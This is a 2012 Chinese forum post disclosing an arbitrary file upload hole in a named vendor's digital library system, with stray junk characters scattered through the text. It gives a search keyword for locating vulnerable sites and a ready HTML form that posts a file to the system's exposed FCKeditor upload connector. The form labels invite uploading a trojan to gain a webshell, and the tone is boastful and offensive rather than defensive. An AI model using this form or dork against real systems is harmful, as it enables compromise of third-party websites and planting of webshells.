主题:图书馆系统任意文件上传漏洞' {5 [( K: T7 Y: E3 N
作者:冰锋刺客9 [6 l3 |" n; D$ t8 Q
厂商:点击书(dianjishu.com)
, {2 i7 p1 {0 v$ `3 @4 d0 G 日期:2012-6-21
% C0 I( E$ D. X) C% H6 A; i ; |: f# M- _% ^( ^& d% f
I 概述
; W- Y9 m/ \- L8 |. e 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
( D* M) C$ A( c- t. v II 简介
& j4 j' p; Y( u; k0 v3 G! I% _ 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"+ M) A: p; q/ C2 e
补充一个漏洞' W' O) ~9 q! N# M" t, e% J. e
<form id="frmUpload" enctype="multipart/form-data"7 T3 p; F2 o3 i$ q
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>) }0 O- ~) w8 z- E0 Y
<input id="btnUpload" type="submit" value="操翻他">
/ q5 n1 `' V' Q6 ~6 N, S# z </form>
) b3 u# B: r& w5 s2 ]" }9 X 你们懂的4 g7 r2 H7 b) D3 O0 c2 d; j8 c
那傻逼提供还需要改包.
' U, G: c; p. A4 F9 Y C5 ] 自己看了下源代码发现fckeditor/ }7 ?/ O: s+ M1 z8 K; o
直接秒杀
6 m, J# l9 h1 Q% B. ^; m: d | |
发表于 2012-9-10 21:20:59
收藏
支持
反对